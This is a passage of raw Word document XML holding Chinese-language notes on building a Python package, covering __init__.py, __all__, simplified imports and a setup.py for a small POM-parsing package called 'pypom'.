    <w:p w14:paraId="45EFFC03" w14:textId="77777777" w:rsidR="004661F9" w:rsidRDefault="004661F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D1C8C66" w14:textId="10FC1472" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="433" w:name="_Toc159779881"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包</w:t>
      </w:r>
      <w:r w:rsidR="00AA0B6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00AA0B6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写</w:t>
      </w:r>
      <w:r w:rsidR="00AA0B6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wheel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="433"/>
    </w:p>
    <w:p w14:paraId="3B42F54E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="240" w:lineRule="exact"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__init__.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C9796C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写包，目录下有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __init__.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就行了，该文件可以空着。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5643CDAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0236041F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F40A44D" wp14:editId="10A2F6C4">
            <wp:extent cx="3776980" cy="2366010"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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776980" cy="2366010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D48DB6C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F16A6FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中可以写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__version__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__all__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等内容，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4310FFEB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__all__ = [</w:t>
      </w:r>
      <w:r>
        <w:t>‘’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>‘’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>‘’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是用来进行例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>from requests import *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种的，写入模块名，否则只能手动导入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> from requests import xxxx,xxxx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E36A333" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简化包的引用过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111FCAA6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__init__.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中直接相对导入了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAE042C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以我们使用的时候可以直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> from requests import get </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE2B280" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不需要跨两层目录去导入某个模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE699E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1B9B1145" wp14:editId="26F24568">
            <wp:extent cx="2543175" cy="1722755"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1460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141"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2543175" cy="1722755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AB6F70" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用自己构建的包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDEF5D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打包历史参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://zhuanlan.zhihu.com/p/276461821</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10898D33" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07FAA696" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把包放在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的同目录下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不需要相对路径引用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，直接像引用官方包一样引用即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D57FCA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A94442B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05081305" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CE61CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>from pypom import pomparser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058A33FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21F92DD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pom_path = r"C:\Users\ranja\.m2\repository\net\minidev\accessors-smart\1.2\accessors-smart-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.2.pom"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5FEB57" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DD453D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>with open(pom_path, 'r') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A0C328" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    content = f.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636BB8E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A0B0C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DA9E994" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print(pomparser(content))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A72AA36" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF88C1E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39244513" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打包自己的库并执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setup.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7AAC37" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的参数很多，表格如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602D8A4D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="375D693E" wp14:editId="159B4DC9">
            <wp:extent cx="5417820" cy="4739640"/>
            <wp:effectExtent l="0" t="0" r="7620"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142"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5417820" cy="4739640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1FA162" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E7F1EA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到库的文件夹的目录下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC764F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="0203DED5" wp14:editId="69883771">
            <wp:extent cx="3913505" cy="1651635"/>
            <wp:effectExtent l="0" t="0" r="3175" b="9525"/>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143"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3913505" cy="1651635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4578A348" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setup.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401CD54D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2FC424" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from distutils.core import setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C845267" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B59EB2C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setup(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639FC1D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        name='pypom',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DC1A32" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        version='0.1',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E58F69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        description='A third party Package to analyse pom data',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BB7F2C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        author='SenRanja',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610A8529" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        author_email='2409879947@qq.com',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA36F5A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        packages=['pypom']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F3BA64" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C428157" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E68DFE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，这些内容是未来使用者会直接用到的东西。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1862F0C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>packages = [</w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxx</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是使用者本地引用时用到的包名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BB8A9D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03C162BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依赖包的声明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF57487" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from setuptools import setup, find_packages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F843BA7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF162FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D6F5E46" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setup(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74807FAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AE8D9B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
